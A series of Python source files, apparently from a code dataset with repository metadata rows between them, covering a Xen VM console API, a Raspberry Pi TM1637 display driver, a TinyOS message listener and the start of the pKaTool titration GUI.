                if cmp (response.get('Status'), 'Success') == 0:
                    BNPoolAPI.update_data_struct("console_create", response.get('Value'), console_struct.get('VM'))
                return response
        else:
            return self.console_create(session, console_struct)
    def console_create(self, session, console_struct):
        """Create a console, routing the request to the VM's owning host."""
        vm_ref = console_struct['VM']
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._console_create(session, console_struct)
            else:
                host_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(host_ip, 'console_create', console_struct)
        else:
            return self._console_create(session, console_struct)
    def _console_create(self, session, console_struct):
        """Local console creation: validate, create, persist, register.

        Requires a valid 'VM' handle and a 'protocol' key in the struct;
        saves the domain's managed config and updates pool bookkeeping.
        """
        xendom = XendDomain.instance()
        if not xendom.is_valid_vm(console_struct['VM']):
            return xen_api_error(['HANDLE_INVALID', 'VM',
                                  console_struct['VM']])
        dom = xendom.get_vm_by_uuid(console_struct['VM'])
        try:
            if 'protocol' not in console_struct:
                return xen_api_error(['CONSOLE_PROTOCOL_INVALID',
                                      'No protocol specified'])
            console_ref = dom.create_console(console_struct)
            xendom.managed_config_save(dom)
            BNPoolAPI.update_data_struct("console_create", console_ref, dom.get_uuid())
            return xen_api_success(console_ref)
        except XendError, exn:
            return xen_api_error(['INTERNAL_ERROR', str(exn)])
    def console_destroy(self, session, console_ref):
        """Destroy a console and persist the owning VM's config."""
        xendom = XendDomain.instance()
        vm = xendom.get_vm_with_dev_uuid('console', console_ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'Console', console_ref])
        vm.destroy_console(console_ref)
        xendom.managed_config_save(vm)
        return xen_api_success_void()
    def console_set_other_config(self, session, console_ref, other_config):
        """Replace a console's 'other_config' dict and persist the VM config."""
        xd = XendDomain.instance()
        vm = xd.get_vm_with_dev_uuid('console', console_ref)
        vm.set_console_other_config(console_ref, other_config)
        xd.managed_config_save(vm)
        return xen_api_success_void()
class BNVMAPIAsyncProxy:
    """ A redirector for Async.Class.function calls to XendAPI
        but wraps the call for use with the XendTaskManager.

        @ivar xenapi: Xen API instance
        @ivar method_map: Mapping from XMLRPC method name to callable objects.
    """
    # Prefix that distinguishes asynchronous XML-RPC calls.
    method_prefix = 'Async.'

    def __init__(self, xenapi):
        """Initialises the Async Proxy by making a map of all
        implemented Xen API methods for use with XendTaskManager.

        @param xenapi: XendAPI instance
        """
        self.xenapi = xenapi
        self.method_map = {}
        # Collect every public method flagged as async-capable.
        # NOTE(review): 'async' is a reserved keyword in Python 3.7+;
        # this attribute access only works under Python 2.
        for method_name in dir(self.xenapi):
            method = getattr(self.xenapi, method_name)
            if method_name[0] != '_' and hasattr(method, 'async') \
                   and method.async == True:
                self.method_map[method.api] = method

    def _dispatch(self, method, args):
        """Overridden method so that SimpleXMLRPCServer will
        resolve methods through this method rather than through
        inspection.

        @param method: marshalled method name from XMLRPC.
        @param args: marshalled arguments from XMLRPC.
        """
        # Only deal with method names that start with "Async."
        if not method.startswith(self.method_prefix):
            return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])

        # Lookup synchronous version of the method
        synchronous_method_name = method[len(self.method_prefix):]
        if synchronous_method_name not in self.method_map:
            return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])

        method = self.method_map[synchronous_method_name]

        # Check that we've got enough arguments before issuing a task ID.
        needed = argcounts[method.api]
        if len(args) != needed:
            return xen_api_error(['MESSAGE_PARAMETER_COUNT_MISMATCH',
                                  self.method_prefix + method.api, needed,
                                  len(args)])

        # Validate the session before proceeding
        session = args[0]
        if not auth_manager().is_session_valid(session):
            return xen_api_error(['SESSION_INVALID', session])

        # create and execute the task, and return task_uuid
        return_type = getattr(method, 'return_type', '<none/>')
        task_uuid = XendTaskManager.create_task(method, args,
                                                synchronous_method_name,
                                                return_type,
                                                synchronous_method_name,
                                                session)
        return xen_api_success(task_uuid)
def instance():
    """Singleton constructor. Use this method instead of the class constructor.
    """
    global inst
    try:
        inst
    except NameError:
        # Only a missing global means "not yet constructed"; the original
        # bare except: would also have swallowed unrelated errors.
        inst = BNVMAPI(None)
    return inst
| mit | -6,386,652,897,247,954,000 | 40.294742 | 164 | 0.508084 | false | 3.707909 | true | false | false |
KyleKing/PiAlarm | .archive-python/modules/tm1637.py | 1 | 6795 | """Manipulate a TM1637 7-segment display."""
import math
import threading
from time import localtime, sleep
from . import config as cg
from .context import IO
IO.setwarnings(False)
IO.setmode(IO.BCM)
# Segment bit patterns for hex digits 0-F on a 7-segment display.
HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d,
             0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71]
# TM1637 command bytes: addressing mode and display-register base address.
ADDR_AUTO = 0x40
ADDR_FIXED = 0x44
STARTADDR = 0xC0
class TM1637(object):
    """TM1637 7-Segment Display.

    Bit-bangs the TM1637 two-wire protocol over two GPIO pins (CLK/DIO).
    """

    def __init__(self, clk, dio, brightness=1.0):
        """Initializer.

        clk/dio are BCM pin numbers; brightness is a 0-1 fraction.
        """
        self.CLK = clk
        self.DIO = dio
        self.brightness = brightness
        self.double_point = False
        # Last digit values written, so brightness/colon changes can redraw.
        self.current_values = [0, 0, 0, 0]
        IO.setup(self.CLK, IO.OUT)
        IO.setup(self.DIO, IO.OUT)

    def cleanup(self):
        """Stop updating clock, turn off display, and cleanup GPIO."""
        self.stop_clock()
        self.clear()
        IO.cleanup()

    def clear(self):
        """Clear display."""
        b = self.brightness
        point = self.double_point
        self.brightness = 0
        self.double_point = False
        # 0x7F is the sentinel that coding() maps to a blank segment.
        data = [0x7F, 0x7F, 0x7F, 0x7F]
        self.show(data)
        # Restore previous settings:
        self.brightness = b
        self.double_point = point

    def show(self, data):
        """Show data on display."""
        for i in range(0, 4):
            self.current_values[i] = data[i]

        # Auto-increment addressing: write all four digits in one burst.
        self.start()
        self.write_byte(ADDR_AUTO)
        self.br()
        self.write_byte(STARTADDR)
        for i in range(0, 4):
            self.write_byte(self.coding(data[i]))
        self.br()
        # 0x88 = display-on command; low bits carry the brightness level.
        self.write_byte(0x88 + int(self.brightness))
        self.stop()

    def set_digit(self, idx, data):
        """Set 7-segment digit by index [0, 3]."""
        assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data)
        self.current_values[idx] = data

        # Fixed addressing: write only the one digit at STARTADDR | idx.
        self.start()
        self.write_byte(ADDR_FIXED)
        self.br()
        self.write_byte(STARTADDR | idx)
        self.write_byte(self.coding(data))
        self.br()
        self.write_byte(0x88 + int(self.brightness))
        self.stop()

    def set_brightness(self, percent):
        """Set brightness in range 0-1."""
        max_brightness = 7.0
        brightness = math.ceil(max_brightness * percent)
        if (brightness < 0):
            brightness = 0
        # Only redraw when the level actually changed.
        if (self.brightness != brightness):
            self.brightness = brightness
            self.show(self.current_values)

    def show_colon(self, on):
        """Show or hide double point divider."""
        if (self.double_point != on):
            self.double_point = on
            self.show(self.current_values)

    def write_byte(self, data):
        """Write byte to display."""
        # Shift out 8 bits, LSB first, clocking DIO on CLK edges.
        for i in range(0, 8):
            IO.output(self.CLK, IO.LOW)
            if (data & 0x01):
                IO.output(self.DIO, IO.HIGH)
            else:
                IO.output(self.DIO, IO.LOW)
            data = data >> 1
            IO.output(self.CLK, IO.HIGH)

        # Wait for ACK
        # NOTE(review): this loop has no timeout, so a disconnected or
        # faulty display will hang here -- confirm acceptable for callers.
        IO.output(self.CLK, IO.LOW)
        IO.output(self.DIO, IO.HIGH)
        IO.output(self.CLK, IO.HIGH)
        IO.setup(self.DIO, IO.IN)

        while IO.input(self.DIO):
            sleep(0.001)
            # NOTE(review): the loop above only exits when DIO reads low,
            # so this branch appears unreachable -- confirm intent.
            if (IO.input(self.DIO)):
                IO.setup(self.DIO, IO.OUT)
                IO.output(self.DIO, IO.LOW)
                IO.setup(self.DIO, IO.IN)
        IO.setup(self.DIO, IO.OUT)

    def start(self):
        """Send start signal to TM1637."""
        IO.output(self.CLK, IO.HIGH)
        IO.output(self.DIO, IO.HIGH)
        IO.output(self.DIO, IO.LOW)
        IO.output(self.CLK, IO.LOW)

    def stop(self):
        """Stop clock."""
        IO.output(self.CLK, IO.LOW)
        IO.output(self.DIO, IO.LOW)
        IO.output(self.CLK, IO.HIGH)
        IO.output(self.DIO, IO.HIGH)

    def br(self):
        """Terse break."""
        self.stop()
        self.start()

    def coding(self, data):
        """Set coding of display."""
        # 0x80 lights the colon segment; 0x7F means "blank this digit".
        point_data = 0x80 if self.double_point else 0
        return 0 if data == 0x7F else HexDigits[data] + point_data

    def clock(self, military_time):
        """Clock thread script."""
        # Based on: https://github.com/johnlr/raspberrypi-tm1637
        self.show_colon(True)
        while (not self.__stop_event.is_set()):
            t = localtime()
            hour = t.tm_hour
            if not military_time:
                hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12
            # NOTE(review): the conditional is redundant -- when hour // 10
            # is 0 the expression also yields 0, so d0 == hour // 10.
            d0 = hour // 10 if hour // 10 else 0
            d1 = hour % 10
            d2 = t.tm_min // 10
            d3 = t.tm_min % 10
            digits = [d0, d1, d2, d3]
            self.show(digits)
            # # Optional visual feedback of running alarm:
            # print digits
            # for i in tqdm(range(60 - t.tm_sec)):
            # Sleep in 1 s steps until the next minute so stop() is responsive.
            for i in range(60 - t.tm_sec):
                if (not self.__stop_event.is_set()):
                    sleep(1)

    def start_clock(self, military_time=True):
        """Start clock thread."""
        # Stop event based on: http://stackoverflow.com/a/6524542/3219667
        self.__stop_event = threading.Event()
        self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,))
        self.__clock_thread.daemon = True  # stops w/ main thread
        self.__clock_thread.start()

    def stop_clock(self):
        """Stop clock thread."""
        try:
            print('Attempting to stop live clock')
            self.__stop_event.set()
            self.clear()
        except AttributeError:
            # start_clock() was never called, so there is no event to set.
            print('No clock to close')
if __name__ == '__main__':
    """Confirm the display operation"""
    # Manual hardware smoke test, stepped through with keyboard prompts.
    # Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21)
    clock = cg.get_pin('7Segment', 'clk')
    digital = cg.get_pin('7Segment', 'dio')
    # BUGFIX: the constructor parameters are lowercase (clk, dio); the
    # previous keyword spelling TM1637(CLK=..., DIO=...) raised TypeError.
    display = TM1637(clock, digital, brightness=1.0)
    print('clock', clock)
    print('digital', digital)

    display.clear()
    digits = [1, 2, 3, 4]
    display.show(digits)
    input('1234 - Working? (Press Key)')

    print('Updating one digit at a time:')
    display.clear()
    display.set_digit(1, 3)
    sleep(0.5)
    display.set_digit(2, 2)
    sleep(0.5)
    display.set_digit(3, 1)
    sleep(0.5)
    display.set_digit(0, 4)
    input('4321 - (Press Key)')

    print('Add double point\n')
    display.show_colon(True)
    sleep(0.2)

    print('Brightness Off')
    display.set_brightness(0)
    sleep(0.5)
    print('Full Brightness')
    display.set_brightness(1)
    sleep(0.5)
    print('30% Brightness')
    display.set_brightness(0.3)
    sleep(0.3)

    input('Start the clock?')
    display.start_clock(military_time=True)
    input('Stop the clock?')
    display.stop_clock()
| mit | -4,063,615,821,204,735,500 | 28.16309 | 98 | 0.547903 | false | 3.347291 | false | false | false |
fresskarma/tinyos-1.x | tools/python/pytos/util/MessageSnooper.py | 1 | 4759 | #!/usr/bin/python
#$Id: MessageSnooper.py,v 1.2 2005/10/27 02:23:37 kaminw Exp $
# "Copyright (c) 2000-2003 The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement
# is hereby granted, provided that the above copyright notice, the following
# two paragraphs and the author appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY
# OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS."
#
# @author Kamin Whitehouse
#
import sys
import pytos.Comm as Comm
import pytos.tools.Drain as Drain
import pytos.tools.Drip as Drip
import threading
def registerAllMsgs(msgs, msgQueue, connection):
    """Register msgQueue with connection for every message type in msgs."""
    for name in msgs._msgNames:
        connection.register(msgs[name], msgQueue)
class MessageSnooper( object ) :
    """This module offers \"register\" and \"unregister\" functions that
    take a messageHandler argument but no message type argument.
    Instead, the messageHandler will receive ALL incoming messages.  It
    currently handles local receive, drain messages, rpc messages, and
    ramSymbol messages.  Any new routing protocols should be
    incorporated into this module.

    usage:
      snooper = MessageSnooper(app)
      snooper.start
      snooper.stop
      snooper.register(callbackFcn)
      snooper.unregister(callbackFcn)
    """

    def __init__( self , app="" ) :
        # app is the application object that exposes msgs/enums/rpc/etc.
        self.app = app
        self.listeners = []
        msgQueue = Comm.MessageQueue(10)
        #register the msgQueue for all message types with localComm
        comm = Comm.getCommObject(self.app, self.app.motecom)
        registerAllMsgs(self.app.msgs, msgQueue, comm)
        #register the msgQueue for all message types with drain and unregister DrainMsg with localComm
        if "AM_DRAINMSG" in self.app.enums._enums :
            drains = Drain.getDrainObject(self.app)
            for drain in drains:
                registerAllMsgs(self.app.msgs, msgQueue, drain)
            comm.unregister(self.app.msgs.DrainMsg, msgQueue)
        #if rpc is imported
        if self.app.__dict__.has_key("rpc") :
            #make sure a drip object exists for snooping on cmds
            drips = Drip.getDripObject(self.app, self.app.motecom, self.app.enums.AM_RPCCOMMANDMSG)
            #register the msgQueue for all rpc response messages
            for command in self.app.rpc._messages.values() :
                command.register(msgQueue)
            #and unregister RpcResponseMsg from drain
            drains = Drain.getDrainObject(self.app, self.app.motecom, 0xfffe) #ugh... hard coded number
            for drain in drains:
                drain.unregister(app.msgs.RpcResponseMsg, msgQueue)
        #if ram symbols is imported
        if self.app.__dict__.has_key("ramSymbols") :
            #register the msgQueue for all ram symbol response messages
            for symbol in self.app.ramSymbols._messages.values() :
                symbol.registerPeek(msgQueue)
                symbol.registerPoke(msgQueue)
            #and unregister from peek/poke rpc commands
            self.app.RamSymbolsM.peek.unregister(msgQueue)
            self.app.RamSymbolsM.poke.unregister(msgQueue)
        #register the msgQueue for all message types with drip and unregister DripMsg with localComm
        if "AM_DRIPMSG" in self.app.enums._enums :
            drips = Drip.getDripObject(self.app)
            for drip in drips:
                print "actually dtrying to register dripmsgs\n"
                registerAllMsgs(self.app.msgs, msgQueue, drip)
            comm.unregister(self.app.msgs.DripMsg, msgQueue)
        # Daemon thread pumps the queue so listeners get every message.
        self.running = True
        msgThread = threading.Thread(target=self.processMessages,
                                     args=(msgQueue,))
        msgThread.setDaemon(True)
        msgThread.start()

    def processMessages(self, msgQueue) :
        # Blocking dispatch loop: forward each (addr, msg) to all listeners
        # while running; messages arriving while stopped are discarded.
        while True :
            (addr,msg) = msgQueue.get()
            if self.running == True :
                for listener in self.listeners :
                    listener.messageReceived(addr, msg)

    def stop(self) :
        # Pause dispatching (the pump thread keeps draining the queue).
        self.running = False

    def start(self) :
        # Resume dispatching.
        self.running = True

    def register(self, msgHandler) :
        # msgHandler must provide messageReceived(addr, msg).
        self.listeners.append(msgHandler)

    def unregister(self, msgHandler) :
        self.listeners.remove(msgHandler)
| bsd-3-clause | 8,937,040,000,648,870,000 | 37.691057 | 98 | 0.709603 | false | 3.616261 | false | false | false |
dmnfarrell/peat | pKaTool/pKa_system.py | 1 | 55804 | #!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# pKaTool - analysis of systems of titratable groups
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# Jens Nielsen
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
import sys
from Tkinter import *
import tkFileDialog
import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt
import pKa_system_data_manipulation
import group_control
import ftir_data
__pKaSystemVersion__=1.2
#
# Geometry helper functions
#
def get_y_fromstab(val, span):
    """Get the y coordinate for plotting the stability curve.

    Maps a stability value onto the canvas: y = top margin + the value
    scaled into the 180-pixel drawing range.  A zero span is replaced
    by a default of 10 to avoid division by zero.
    """
    zero = 10            # top margin of the plot area, in pixels
    graphrange = 180.0   # float: under Python 2, 180/span would truncate
    if span == 0:
        span = 10
    return (graphrange - val * (graphrange / span)) + zero
#
# --------
#
class pKa_system(Frame,pKa_base.pKa_base,pKa_system_help.system_help,
pKa_system_help.pKsensitivity,
pKa_system_help.decompose,
pKa_system_micro.Micro_states,
pKa_system_file_menu.file_menu,
pKa_system_file_menu.fit_menu,
pKa_system_data_manipulation.data_manipulation,
CCPS_stab_opt.Optimisation_Analysis):
    def __init__(self,numgroups=None,parent_application=None,data=None,protein=None,field_name=None,update=True):
        """Set up state, build the windows, and optionally load data.

        numgroups: number of titratable groups (prompted for if None).
        parent_application: embedding Tk application, if any.
        data: packed system data or raw titration data to load.
        protein/field_name: identify the source record; the sentinel
        '__enzsim_application__' marks invocation from EnzSim.
        update: when true, draw the curves immediately.
        """
        #
        # Set up the main window
        #
        # The main window provides choice between the different modes
        # for now: pKa Calculations, pKa System
        #
        self.ID='pKa_system'
        self.font="Times 12 bold"
        self.fg_colour='white'
        self.bg_colour='black'
        self.colour_order=['#646464','#4444ff','red','green','magenta','yellow','orange','grey','magenta']
        self.linewidth=2
        self.names={}
        self.lastdir=None
        self.parent_application=parent_application
        self.init_not_done=1
        # NOTE(review): self.ID is assigned twice; the duplicate is harmless.
        self.ID='pKa_system'
        self.protein=protein
        self.field_name=field_name
        #
        # Stability window parameters
        #
        self.stab_window=None
        self.U_control=None
        self.old_stab_status=''
        self.exp_stab_curve=False
        #
        # Set the pKa calculation parameters
        #
        self.pHstart=0.00001
        self.pHend=20.0
        self.maxcrg=1.0
        self.mincrg=-1.0
        #
        # pKa method: name -> solver class from pKa_calc
        #
        self.pkamethods={'Boltzmann':pKa_calc.Boltzmann,
                         'Monte Carlo':pKa_calc.Monte_Carlo,
                         'Tanford-Roxby':pKa_calc.Tanford_Roxby,
                         'Monte Carlo (C++)':pKa_calc.Monte_Carlo_CPP,
                         'Boltzmann (C++)':pKa_calc.Boltzmann_CPP}
        #
        # Check if we are called from EnzSim
        #
        self.enzsim=False
        if protein=='__enzsim_application__':
            self.enzsim=True
        #
        # Set data
        #
        self.data={'numgroups':numgroups}
        #
        # All lines drawn
        #
        self.lines={}
        self.state_lines={}
        self.stab_lines={}
        self.to_clear=[]
        self.stab_test_on=None
        #
        # Do the window
        #
        self.do_window()
        if update:
            self.update_pkasystem_curves()
        self.window.update_idletasks()
        #
        # convert data: packed system data has a 'groups' key, otherwise
        # it is treated as raw titration data.
        #
        if data:
            if data.has_key('groups'):
                self.unpack_all_data(data)
            else:
                self.convert_titration_data(data)
        return
#
# ------
#
    def do_window(self):
        """Build the startup window that asks for the number of groups.

        If self.data['numgroups'] is already set the prompt is skipped;
        otherwise the window blocks (wait_window) until Return is pressed.
        Ends by calling self.getgrps() to build the main interface.
        """
        #
        # Main window
        #
        if not self.parent_application:
            Frame.__init__(self)
            self.window=self.master
        else:
            self.window=Toplevel()
        #
        # Title
        #
        #self.window.geometry('+280+380')
        self.window.title("pKa System - Play with titratable groups")
        #
        # Get the size of the screen
        #
        #
        # Text box at top
        #
        label1=Label(self.window, text="Enter number of titratable groups",font=self.font)
        label1.grid(row=0,column=0, sticky=W)
        #
        # Entry field
        #
        self.number_of_groups=IntVar()
        self.numgrps_widget=Entry(self.window,textvariable=self.number_of_groups)
        #
        # If we have a number then insert it
        #
        if self.data['numgroups']:
            self.number_of_groups.set(self.data['numgroups'])
            self.numgrps=self.data['numgroups']
            self.window.destroy()
        else:
            # Local callback: read the entry, then close the prompt window.
            def destroy(event=None):
                self.numgrps=int(self.number_of_groups.get())
                self.window.destroy()
                return
            self.number_of_groups.set(3)
            self.numgrps_widget.grid(row=0,column=1,sticky=W)
            self.numgrps_widget.bind('<Return>',destroy)
            self.window.wait_window(self.window)
        #
        # Done
        #
        self.getgrps()
        return
#
# --------------
#
    def getgrps(self,event=None):
        """Build the main interface: titration-curve canvas, menus and
        per-group controls.

        Creates the titration window (self.titwin / self.tc canvas), the
        control window (self.win) with File/Command/NMR/Optimise/View/Help
        menus, one group_control row per titratable group, and the row of
        global controls (stability toggle, pH step, pKa method, MC steps).
        Finishes by activating callbacks so slider changes redraw curves.
        """
        #
        # Get the number of groups
        #
        # NOTE(review): 'string' does not appear to be used in this method.
        import string
        #
        # Open the window for the titration curves
        #
        if not self.parent_application:
            Frame.__init__(self)
            self.window=self.master
            screen_width=self.winfo_screenwidth()
            screen_height=self.winfo_screenheight()
        else:
            self.window=Toplevel()
            screen_width=self.parent_application.winfo_screenwidth()
            screen_height=self.parent_application.winfo_screenheight()
        #
        self.titwin=self.window
        self.titwin.title('Titration curves [native]')
        #self.titwin.geometry('+20+%d' %(95+self.numgrps*43))
        #
        # Draw the window with the titration curves
        #
        self.titwidth=1200
        self.titheight=450
        self.tc=Canvas(self.titwin,bd=5,bg='white',width=self.titwidth,
                       height=self.titheight,
                       scrollregion=(0,0,self.titwidth,self.titheight))
        self.tc.xview("moveto", 0)
        self.tc.yview("moveto", 0)
        self.tc.grid(row=0,column=0)
        #
        # Axes
        #
        self.draw_ordinates(self.tc)
        #
        # Open window with the controls
        #
        self.startrow=3
        self.groups={}
        self.win=Toplevel()
        #
        # Create the main pulldown menu
        #
        self.menu=Menu(self.win)
        #
        # File menu
        #
        self.file_menu=Menu(self.menu,tearoff=0)
        self.file_menu.add_command(label='Load system',command=self.load_system)
        self.file_menu.add_command(label='Save system',command=self.save_system)
        # Extra entries when embedded in an EAT or Ekin parent application.
        if self.parent_application:
            if getattr(self.parent_application,'ID',None):
                if self.parent_application.ID=='EAT':
                    self.file_menu.add_command(label='Save system in EAT & Exit',command=self.send_system_to_EAT)
                elif self.parent_application.ID=='Ekin':
                    self.file_menu.add_command(label='Save system in EAT',command=self.send_system_to_EAT)
        self.file_menu.add_command(label='Load titration curves',command=self.load_curves)
        self.file_menu.add_command(label='Save titration curves',command=self.save_curves)
        self.file_menu.add_command(label='Load titration_DB data',command=self.load_titdb)
        self.file_menu.add_command(label='Load pH activity profile',command=self.load_pH_activity_profile)
        self.file_menu.add_command(label='Load pH stability profile',command=self.load_pH_stability_profile)
        self.file_menu.add_command(label='Load FTIR data',command=self.load_FTIR_data)
        self.file_menu.add_command(label='Print population table',command=self.print_table)
        self.file_menu.add_command(label='Add group',command=self.add_group)
        self.file_menu.add_command(label='Remove exp. titration curve',command=self.remove_exp_curve)
        self.file_menu.add_command(label='Exit',command=self.quit_application)
        self.menu.add_cascade(label='File',menu=self.file_menu)
        #
        # Command menu
        #
        self.command_menu=Menu(self.menu,tearoff=0)
        self.command_menu.add_command(label='Decompose system',command=self.decompose_system)
        self.command_menu.add_command(label='Sensitivity analysis',command=self.sensitivity_test)
        self.command_menu.add_command(label='Change dielectric constant',command=self.change_dielectric)
        self.command_menu.add_command(label='Activate updating',command=self.activate_callbacks)
        self.command_menu.add_command(label='Deactivate updating',command=self.deactivate_callbacks)
        self.command_menu.add_separator()
        self.command_menu.add_command(label='Copy group to EAT_DB Ekin',command=self.copy_to_Ekin)
        self.menu.add_cascade(label='Command',menu=self.command_menu)
        #
        # Fitting menu (NMR fitting and uniqueness tools)
        #
        self.fit_menu=Menu(self.menu,tearoff=0)
        self.fit_menu.add_command(label='Fit system to loaded curves',command=self.fit_system_to_curves)
        self.fit_menu.add_command(label='Fit to pH-activity profile',command=self.fit_to_ph_activity_profile)
        self.fit_menu.add_command(label='Fit to loaded curves and pH-activity profile',command=self.fit_to_curves_and_ph_activity_profile)
        self.fit_menu.add_command(label='Estimate experimental uncertainty',command=self.estimate_experimental_uncertainty)
        self.fit_menu.add_separator()
        self.fit_menu.add_command(label='Fit to FTIR data',command=self.fit_ftir)
        self.fit_menu.add_command(label='Fit to FTIR data and pH-activity profile',command=self.fit_to_ftir_and_ph_activity_profile)
        self.fit_menu.add_separator()
        self.fit_menu.add_command(label='Combinatorial scan',command=self.combinatorial_scan)
        self.fit_menu.add_command(label='Show close parameter sets',command=self.show_close)
        self.fit_menu.add_command(label='Test uniqueness',command=self.test_uniqueness)
        self.fit_menu.add_command(label='Uniqueness scan',command=self.uniqueness_scan)
        self.fit_menu.add_separator()
        self.fit_menu.add_command(label='Evaluate fit',command=self.evaluate_fit)
        self.geom_var=StringVar()
        self.fit_menu.add_command(label="Do geometry optimisation",command=self.start_geom)
        self.fit_menu.add_command(label='Identify number of groups in system',command=self.identify_no_groups)
        self.menu.add_cascade(label='NMR',menu=self.fit_menu)
        #
        # System analysis and optimisation
        #
        self.optana_menu=Menu(self.menu,tearoff=0)
        self.optana_menu.add_command(label='CCPS population/Stability',command=self.stab_and_CCPS_pop)
        self.menu.add_cascade(label='Optimise and Analyse',menu=self.optana_menu)
        #
        # View menu
        #
        self.view_menu=Menu(self.menu,tearoff=0)
        # Show microscopic states
        self.micro_var=IntVar()
        self.micro_var.set(0)
        self.view_menu.add_checkbutton(label='Microscopic titration',
                                       command=self.update_pkasystem_curves,
                                       variable=self.micro_var,onvalue=1,offvalue=0)
        # Show loaded titration curves
        self.display_loaded_curves=IntVar()
        self.display_loaded_curves.set(0)
        self.view_menu.add_checkbutton(label='Loaded titration curves',
                                       command=self.update_pkasystem_curves,
                                       variable=self.display_loaded_curves,onvalue=1,offvalue=0)
        # Show ftir window
        self.show_ftir=IntVar()
        self.show_ftir.set(0)
        self.view_menu.add_checkbutton(label='Show FTIR window',
                                       command=self.update_pkasystem_curves,
                                       variable=self.show_ftir,onvalue=1,offvalue=0)
        #
        # Window for manipulating kcat of microstates
        #
        self.kcat_window_visible=IntVar()
        self.kcat_window_visible.set(0)
        self.view_menu.add_checkbutton(label='kcat of microstates',
                                       command=self.toggle_kcat_window,variable=self.kcat_window_visible,onvalue=1,offvalue=0)
        self.menu.add_cascade(label='View',menu=self.view_menu)
        #
        # Help menu
        #
        self.help_menu=Menu(self.menu,tearoff=0)
        self.help_menu.add_command(label='About pKaSystem',command=self.about)
        self.menu.add_cascade(label='Help',menu=self.help_menu)
        #
        # Configure the menu
        #
        self.win.config(menu=self.menu)
        #
        self.win.title('Group controls')
        #
        # Place window close to center
        #
        self.win.geometry('+%d+%d' %(screen_width/2-min(600,screen_width/4),screen_height/2-min(500,screen_height/3)))
        #
        # Buttons for each group: one group_control row per titratable group.
        #
        int_ene=1
        for id_num in range(self.numgrps):
            #colour=self.colour_order[id_num%len(self.colour_order)]
            int_ene=1
            self.groups[id_num]=group_control.group_control(self,
                                                            self.startrow+id_num,
                                                            id_num,
                                                            self.numgrps,
                                                            int_ene,
                                                            self.colour_order)
        #
        # Button for controlling stability window
        #
        self.stability_var=StringVar()
        self.stability_var.set('off')
        self.stab_button=Checkbutton(self.win,text='Stability curve: ',
                                     variable=self.stability_var,onvalue='on',
                                     offvalue='off',
                                     command=self.stability_on_off)
        self.stab_button.deselect()
        self.stab_button.grid(row=0,column=0,columnspan=2)
        #
        # Exit button (labelled differently when driven by EnzSim)
        #
        if self.enzsim:
            self.exit_bt=Button(self.win,text='Data->EnzSim',command=self.quit_application)
        else:
            self.exit_bt=Button(self.win,text='Quit',command=self.quit_application)
        self.exit_bt.grid(row=0,column=2,sticky='wens')
        #
        # Snapshot button
        #
        self.snapshot_btn=Button(self.win,text='Snapshot',command=self.snapshot)
        self.snapshot_btn.grid(row=0,column=3,sticky='wens')
        #
        # Window capture button
        #
        self.print_btn=Button(self.win,text='Print2File',command=self.print2file)
        self.print_btn.grid(row=0,column=4,sticky='wens')
        #
        # Clear button
        #
        self.clr_btn=Button(self.win,text='Clear all',command=self.clear)
        self.clr_btn.grid(row=0,column=5,sticky='wens')
        #
        # pHstep slider
        #
        self.pHstep=DoubleVar()
        self.pHstep_sl=Scale(self.win,from_=0.01,to=2.0,resolution=0.01,
                             orient='horizontal',relief='ridge',
                             command=self.update_pkasystem_curves,variable=self.pHstep,
                             label='pHstep')
        self.pHstep_sl.grid(row=0,column=6,sticky='wens')
        self.pHstep.set(0.5)
        #
        # pKa calculation method selector
        #
        self.pkamethod_sel=StringVar()
        self.pkamethod_sel.set('Boltzmann')
        self.pkamethod_button=Menubutton(self.win,textvariable=self.pkamethod_sel,relief=RAISED)
        self.pkamethod_menu=Menu(self.pkamethod_button,tearoff=0)
        self.pkamethod_button['menu']=self.pkamethod_menu
        #
        # Methods
        #
        for method in self.pkamethods.keys():
            self.pkamethod_menu.add_radiobutton(label=method,
                                                variable=self.pkamethod_sel,
                                                value=method,
